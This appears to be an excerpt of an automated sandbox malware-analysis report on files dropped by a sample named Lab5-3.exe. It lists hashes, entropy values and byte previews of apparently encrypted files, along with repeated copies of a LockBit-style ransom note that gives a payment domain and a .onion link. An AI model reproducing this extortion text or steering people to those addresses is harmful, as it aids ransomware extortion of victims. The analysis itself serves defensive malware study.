                                                                                                          SHA-512:F36AEDD3AD520508BA6F6500E25ED0AB3C41DAB7B79A7F30B7078877218D33E18571A39373E06F4D5C605DCC5CF8929F0E0C955CDC33F165A658F043FA90499C
                                                                                                          Malicious:false
                                                                                                          Preview:=....Jz...f.Y..C.g..-tb...5L.1F..u.....1...?....#.?!W.]...0.h...P...].VYt...oVR.},' R.Dv. ........0.-..f.-.....-'..\..r.7.%..O...1..4.j...&,g..y,..;......u....R..b.......`.@.....RE.mU.C.U......).K]\j...r..U\..Cf.....l.I........9o:.p..7.(j.e..;.`t.zg..,.P.#....;.m...I.+...Ojzy/B/..EN..?...\d].emf..C...7.NU.........]4.......Z..uh.KXf.D.E..V...{.Z...#./&8.!.P..._..x?....U. .-...5..u*y$..F..H_n..{.p0.2.'d...:s...?.@.)VW.U..8...E/3<...`......ex573tu.:.......c...F....p.....I.....(......9.e8..c..8Z.HsuO.(+e....o..=..,z..].Tka../.'.Z........X.P;...8...Z)..'._.~..*.qMw]..'....l.j\.D,.9...v.,Zz\hw2.._3..O.%..F....:...>~..C....?......(.zr...-)8..-......J.7}rG"*...........VY.@/.Y.....W1..E.X..i.h.k...n*.).P..@VF|....PPM.f=.j...2q+M.:..9Y..L{*....d.*.n........P3k...4l.\!.X...[P.<.0r....d...,6..3.jv...>v...F.A..z'.>..g.KI./.$.2..PhA..R..2......q..|R/6.<n...=a..jQ7...<.f.I.........b\z.#c.Jj..ov8.r...B..sc.G.I....o...1.V...7_t...NL.4by6...S.D.P....,..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):7.930803486803581
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:YvgOYxsRRIOCMuXgH9kkRcBDCcMycHfUTid3hBaUoSGFcmeykEdEElU92i:YvgOpKTPaRG4ybGx0uKeY2ElUJ
                                                                                                          MD5:86FD9B041E49C4088B5A41155560CCAA
                                                                                                          SHA1:0F94D64443081108C2F5A2E004FC695D9517B314
                                                                                                          SHA-256:20C75BDB3DD8B5E6A43903CB46036C20F2BBFB02DB4819DBFCD8E5617AD1ED4A
                                                                                                          SHA-512:EBF8725D656D69A4CF300B5A04E8755464B21EA11853CC0148CF115E824B95DBDF179760705099BB30D10F46B2BCCE8E562EE76AA5318FEAC754F620679E8B8F
                                                                                                          Malicious:false
                                                                                                          Preview:v..nH..7<q.."E....o;~..nEy.]....Aa...ow.....|..8.M...{H..Yj.w....y.M)..m(..MSM../a...^6k(...q.e.-R..G.....]&>z.x.?8.x7..:.A0BKO......i..n......I......4U.f&......|...../2...;.:..........$ju.zp.Bp..bPZV..EW-b@..*bS{.."O..Y..>d...h........ .v..H..k...S.S..o.?]....`........st....DV..().Hb.uV...H..a..EE.q.S.JZ1.Ja{Q0..X..Z....&.."5Q...{}.i./Y.F..C..g.......F.z....ZUN.......v...W....]:.S....f/..0.~..jR.......]....M...=...|.y..t.@-.y...>.$...//1.[GL......J....F..x.....R5.4....'...up.h&.{. Z.1T..Y..,.D.W4....|.o...o@.<Nx...s.7.z.g.)m\...f.....9w......=.xG.?I...g=0.L.lt...M...vzL?9...Q...o...':p.i.P.g$q....Y....lW.N*...........i._.;r....w;%..fs.9....b7Yx.M#~.TI.Q.y.l....Z.(_.U..V.P....:Z...X...[2..h.G.g...2z{~..f.Ys.......PxS...i..@...0@.M!.....u......A...Z.^.GV.VS.x...~0N....1a...q.%t+.>7`?....b9.s..f..7..>...5....v....s......8.7w^..3.dm.9j.=`...>.#.Q.).*.....-....g.`.V.&x....7....:p...Q.^g......i/..-.N>R..ko..a..5...[>I......1..[ ..%..,.;jY
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):664646
                                                                                                          Entropy (8bit):7.033256626494193
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:EVekpVtIE8QQ5RJyMGT6oFi6+RARsWsdjI8w7xNy/uhD5aJG5WETDN/K8NzVGJDG:oeCVtIEO5RJyMGT6oFi6+RARsWsdjI8E
                                                                                                          MD5:4FA0DD9D3B107D52066304A8AF7E884E
                                                                                                          SHA1:88C95CD7059FF622082757E1C2E405387E8B86E5
                                                                                                          SHA-256:9AA98B0DD4FDA9E447660FDB15C7EF320220FBBEC53811961BE3CAC51FF837F0
                                                                                                          SHA-512:75944818299E1F7EC8265010CF99F49278A0F9768332512AACDB2A836F67CB5BBEDDD8E0D8D821F62196B476D52A6ED8A35F07AB0E797955BB9BB74C527784BC
                                                                                                          Malicious:false
                                                                                                          Preview:aL....a..o.tp..a..Mtq...XL..Z.......3.v#..3.1.....-:..4..G/Z.];^.......l..K).......f...$.....L.&...`b.. .,.{7.m....<0......=.L..y.......v..=...>..M.U..>O....?"....8.......+..!../CEd.a}1%5..5=.m*.".Y+....TpX.$wdI&;a..\..........Z. `'..Q.k...^i..g6.dGl.4-.*t....N.....E.'J>=.N\..Q.../....<8c..Qx9.&Cf.E)..Mz........BZ.VW.&.4"......-.6.O.G....ZC*.>.4....s..m...!.*x....J.....umT.E&.k.....8...m..q.D3...(..+#.g2<..................K...P..is..L.OX..-.v...E.)U..P....i...o.U..-?&bb......|*.x.. :Sl.....I.}...~..:.El....W.4.S..........+..........I.'kE_.2....'.d..?y..xC)H...`..".28..$2.&t{...WJ@.".....N.\...@..]$..f+..O..5!p..*..O...b.\F....w......+..\J?.UG c.4.\!.\^.g..a.w?.0|...!(.jM_:..`a.W.)..EF1L..........$*.bv..V..T...*Y$...A.KL...!T=..zG....2.c......7..%.9.r,.+.q.Kf!Q..cRI...cC.....^.$.A.a.....*.nZX....$|.J........f.s..{...o.`{V.LA._...t)..e.z...E......D$......X..d...?..N.YLT^~C...o=..tJ#y..`.m.......!...kg..xXm.f.$.......zR...^b.|.C!.. ......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17648
                                                                                                          Entropy (8bit):7.9902578297214015
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:NxYu7ZXYucpJ3WaGDOE+ESu4tQbKDi1QkXNNjf03tb:g0ZX/RilESz1i03Z
                                                                                                          MD5:942E95D53C971841CF71F07279BDD81B
                                                                                                          SHA1:0DD10233448940B78C7AB1CF9078478439C5B506
                                                                                                          SHA-256:FB7B4B1A3A672037532110579107E68BC49EB08C0553BDBF9C47B078655B1044
                                                                                                          SHA-512:E91F22509A95AC3C52E538F0BB4886B8BCBAC237AD8591876CDB8479B90CCCBE7259431825914711AA127FFF22D0812CE26988343BC809B7A9DC9C5E988D935B
                                                                                                          Malicious:true
                                                                                                          Preview:.XLb.".Vl...^B=...I.-..v_......:..).RH.3..UNZ.;.....'.2h..I....... .$..y.z.X1...!.^}......5.L.1[v....!.... .....V..._...X......e~..u'.M.t.........Ys2.P..w.X.I...O~4..S..+k.......!..Md..m.q}....a.k.y>+.GwrBLU......./..c....T....... ....<*..O.....^....L.....I..x$..qB.. ..Ue.(.<Q.ZZ.O....t..7A.m.`..|.9f...4._v.6@y....."27..z.8..u...\..SM]^.zE ..Nx....[u.....P..x.....TmH..C&.&kyD..b..t...2.B...............4O........L...r...8..=.K./...5.7.4...2.s...N..._PZ..^.p...Y...1.@........ 4.e...&(CB..aTx.g......$......j._..0-!.m.{.(......*i7~....<..v4...i....\.B&}m..P.(...#.(a.P.+[3.@*O...e[.......H....r....}"l..i..~._..qnD..[-...i.Ra.(A.}.l.Y.......2..@../.M..>.4..B.a.}.".n.le8...c~/c..o*ws&.....k..... *E.|R=6...hT ..3;i..".......>.2U....L... 5;..T....TTq....Y.o..b..].8.... .*....]...t")[...v...)...R-ey...;...$...v..8..^..[y=..RI:n!j....-...;... ....}.&V..K.... 0f.bf.a.{%.'<....9.....gimW..P.t..?.R#...... ..W..Oj.p..e(.../...~H[f..[.....ii..3V.t.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17184
                                                                                                          Entropy (8bit):7.989786140941046
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Bbzh0oqywBhR8+7Sl1eBaon5gI55g4gFpitXG9xtb:VjqyKR8+Ol1LoTgzFpitWZ
                                                                                                          MD5:DE4A081E14029F42983E12C2D3CF492B
                                                                                                          SHA1:D1E290C877C1ACA4925272563F17CF59490A8771
                                                                                                          SHA-256:DD824F84A07FD8055FBE475F3E1221A53762F09D80AAC67D2368C14469DE295A
                                                                                                          SHA-512:D523F7E427EB0F8B1353E65E5589A07C3CEECD7A5285DDFD759490F8CC4E7F38D7D4C0DAEDC72B55A0F2EA347105C59D9A602B9293E0B3A6CA8B7B42CB48E27D
                                                                                                          Malicious:false
                                                                                                          Preview:.B."....$.s.@I.........S....8...P...........,.|..P..W7.Lm<.4oqT...+w.a...c.:..q{m#'O4...*.N...1........5x......Z.._.../.Z..V..Z.s..[.(.."........6.n<.&..h.nU...=..?f..>L$..j..z..........|_Hl.=.?..T..1..y.7.>.H...Dm..#P\.y.#pk...K..[`..?....m.....~...)#T&s..F..U.Z.SPh.........i.ZJ......`.|._"m^@x.h.p?..2.s..vr.if....=a.&.D=...*.]..CM...5|.UN....Mbf... <mB.Xy.c. 4.....KkG.W&<...{;N....BV..j.0.....z._.p0....-!..y"..l..G.'. .}P]48..q^..]G4G.,.[[#.+..T]...pn.j..P..s.:>.XE....%..|;t.|j.6y=.%.5..(~..U.N....OF.zh.R.. ....e.V..T....|.Q/j9...>e_.!*..J..H. ..d..f0...:KjO.=ZP..*uk-.c......T.p..956T9....rZ.t..F..ia.......cN<V..."=uE.~...................c...r.q.t:Q.E...~j.@..`.....bU..........n..{e+..0.WIv|..I...2.1b....%..<.Q...Er..\.X.....<.......J..>zc3.....j.........[|h..b.....=.GU}?...Y.8....[o......|.7.....c.i....w.....~..k.]a..._>../c..]s............JS.^.M..uD..R....e....z....O..@....q:..a5bK*...:.{=*O..K..?.&r=Wn.s....E.(.v.K......D..6.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16464
                                                                                                          Entropy (8bit):7.988441520229441
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:BIYj5EOC25X4MAI/aHVqVnR7oE8m34DNkBq9UFIO1FTritb:v5EOCox/jVnR5L4xdUWmFKZ
                                                                                                          MD5:6C525B6BA586D09CE08585E239506395
                                                                                                          SHA1:61FE9629EBD9E9C7B7AB4FF5168EC50D6129D454
                                                                                                          SHA-256:6BEA79598EA10A8B22B7606B3C96E76B383FF2A754CA4428F9055C967991673E
                                                                                                          SHA-512:89BA0B9CC75FEF81767BA06FF5468139221C8CA85A653557114EBDE74FA54C4A0D8773B5530E9B6A295BA2206FBC781F8C2A34BCE9CE4D6B215FC41B580097D4
                                                                                                          Malicious:false
                                                                                                          Preview:{.-A....a.......y....%.r..D.....&^^..06..`O.......$U...Po.!..ZJ..0a5..95.(...x"(7.lV....Y...Z.tA.\--.lW..,a..J#i..&.h.....@..(.....;Y..Qc..3..l|9....y'..../j\Iy.W......eu!.-[h.{l..X..../M.H.p.....5....fF.o"..E.x....o{...l..N..;........0..>,.X/..0%\.wD......O.[V.B....Q<`g..e...O9i.Yck....y.H..^...!..`5..L..:Y...0.S.. ..:.&.0..D~.W..Q.D|.(...*/.p.(....BK....e#>"....F_.pw.m.W.x......LT.^.>..<......(....^,u.b[J.....J.}g.o.Q...8..Q....sH.VK...hgw...:3^../y........,.qsy..d....-.P.X./...F...#.....9..7?.t........"e..|.*9p....k'Is......%k../.^..F=.p....-^.=...N^FHU....V._.P#.....qf.Xp..B....e.....+T..........P........{+........<v.b.r(..+.vk.#...%...|...rC......QX.-Y./.t.#".v...I...n...q.gjD.).m.......|.5.'..q.........".....x.{[.....t.}..eSFf...4!...=.?32UV...r.W...@9orb.^.....O.2OH.h..;`..Vw"_8....?W.U..7...M.>PA..<:...:3..oU.PmMge....Y....2....(...v{.Q{..NW.$....Z...Kz`]H..p....}..O...`.H~....R*Z.z....e...u-#+.PD.l..\l..E..srm....V..<;A.Vh..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18672
                                                                                                          Entropy (8bit):7.991205765386752
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:R3JK9yqtDlc6zYnBnGmS5sQ1vT7pEDefumAPgzwH2izuZJtb:R3GZc6MBGmS5sAvT7pEmumTczQZ
                                                                                                          MD5:DB6D0616905A5AEDEC9E3FEB4361B610
                                                                                                          SHA1:2C69769147604DBEA07CB98901A93F07DF677C97
                                                                                                          SHA-256:85C3AB830F7D6CD6E59543CB4391D08DC6CF45325FC253C976DD933E1C33A8D0
                                                                                                          SHA-512:77FD25B849B7AA2FAB054935E0820099E3E467F865D289A866ABFDEA419B5DE550203432A5E67F060B8512B594291F2BE742981DAD82F61A49729D4F5A3844EA
                                                                                                          Malicious:true
                                                                                                          Preview:.E.....+?M..(.bb......\.x.Nj5..@.j.j..............&.`.`...t..V.9H.=.N.%..>..A.......ao}.....&{...ye1...2J]..OB.../..........Q..b.e./........,..L..u..O&I..#.6.2V9...b..e{..+m=qk..+.\_.9q7.../.c.s.....+d:.....u/....w.o." b.2.@....REj...m.L..^`....Bo!..p.o-.O.A.J..<.#.,..T....[.+..B^.,.v.U.......h..g...aD..#s...Z..V..F{,n...sx.j....ZqO....5.w..nM(.x......%)t.Mc p..l..^$.FO.cX..7.V%..3U....m..1...{........Z..t....x..f....(.eS...<q;.>.(..kOl.Tv. x...@...+.l+.l=.@R..a.~.2I5/.zJ.X.).......G...sg.B...9H.......~.............Q.<.G.S.=M..S-.k.`..R....B..G.^.`%$..jG.L..<?..s=..X|.4o.]..'n6....U]....C.5R........@k.+A.+.S....d....c..W~../f6..].....8^bF.........+.).&../c.#C....<...w...G(i.f..z\U..L'...B=.xjY..S2.....FQQ.id..-'F.....-..;V.M ....;.H.;V}.....g2B.].f.....Q...(.F.n.dM.c..I.....y.Rg0.../i..-@.....T..N./5..(.q.. ..A.A\Fg.......F !.~...U0N0.B....X2.p+Hwv.D.4..........^'.....O.7.bH....B.m_z.......ly.W..ka.r..X9....o.>.x...m..1*+4'2!^..s
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15808
                                                                                                          Entropy (8bit):7.986858602021976
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Dny1YRtx6Xien9LXRWBQDx2+0d4UzOBPaMr1FE4cEtb:bygxkl9Lh2Qo+0d4Uz8FDcEZ
                                                                                                          MD5:91755FECD7B69DD58B89D0A39B1706B5
                                                                                                          SHA1:97580800DB7516144A65AE454BD15863112FE473
                                                                                                          SHA-256:8FC79A0BC3DCBF072AFD4732D3E5FB094451DDE676A529AB28EA66473D4B59F2
                                                                                                          SHA-512:DA17B869634CA785C7DD419C3175DAEEA6267862D23A311F6725DD783275108D11CBA8852916D7E153ED5F044E1A42E8D81EC7B69928F6915A1A67851F25F171
                                                                                                          Malicious:false
                                                                                                          Preview:,.]....^..2...V........t.yv.$6. (<....,q7..1.....b+O3 .Zdv..xZ..`..6.).!....G:@..X.W.y"x@.uK.1~..L.......k,.O.6._.F$.....t.R.zR..C]./if.:i+.....z.m.t...x.Y.&...O.../..S....=X....s..n...i....c.n...1w..x.c... .C..X..}.R.5.a.f.f...h.3S...e..g{b....."....W[U_Uf..4&A.yr...~[.....o....3.6.....Y}.N..0......\v...E....W=.Y./.H..x.".f6..'.Xdu...r.,....Nf..R.o..,+.[x..,...y.W7.......p..JL<(\.d_~..s...0|P{K-4.l............F..w.?.&..........ME..Bg..Z.@nDK.......G|.H5h".0..$T...W..I...].C..y.{...=.....&A.r.$H8H..80.80.c#6q{....*4...."0.._.*-H\....L.....@...A..1S&...(.ye~....../V.'Rq.gR...........\S....j.m&6.2..Q......}0..`.`. SEb..a.v...j.O{..T..d..M..t....mC..#.......$......B..".(.....-....7L!..7...k.v.\D.@t...MW....r..~....I.)5.k....cR:...*,..F....\..0....z'y.....>\+D}T."4D\o.Q.3.y......U..FJ..N...F.c.=..............$.....5r+bi.r!.L..#....... ..."&U....~n.=.Q....j....'.v:..}W.|...{".l.\R....)e.;"....e\.t.7Y.0...b.........v.+....."...?8.{..x....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
